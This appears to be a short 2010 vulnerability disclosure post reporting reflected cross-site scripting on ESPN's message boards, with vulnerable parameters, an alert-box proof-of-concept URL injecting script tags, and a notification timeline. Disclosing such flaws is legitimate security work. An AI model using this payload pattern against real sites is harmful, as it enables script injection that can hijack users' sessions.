+++About ESPN Global+++
http://espn.go.com
+++Affected URL(s)+++
http://boards.espn.go.com
+++Vulnerable Parameter / Function+++
sport
id
nav
http://espn.go.com
+++Affected URL(s)+++
http://boards.espn.go.com
+++Vulnerable Parameter / Function+++
sport
id
nav
+++PoC+++
http://boards.espn.go.com/boards/mb/mb?sport=espn'><script>alert('XSS from sport')</script>&id=index'><script>alert('XSS from id')</script>
ESPN Global Ist Notified: January 2010
IInd Notification: September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)
Best Regards.
No comments:
Post a Comment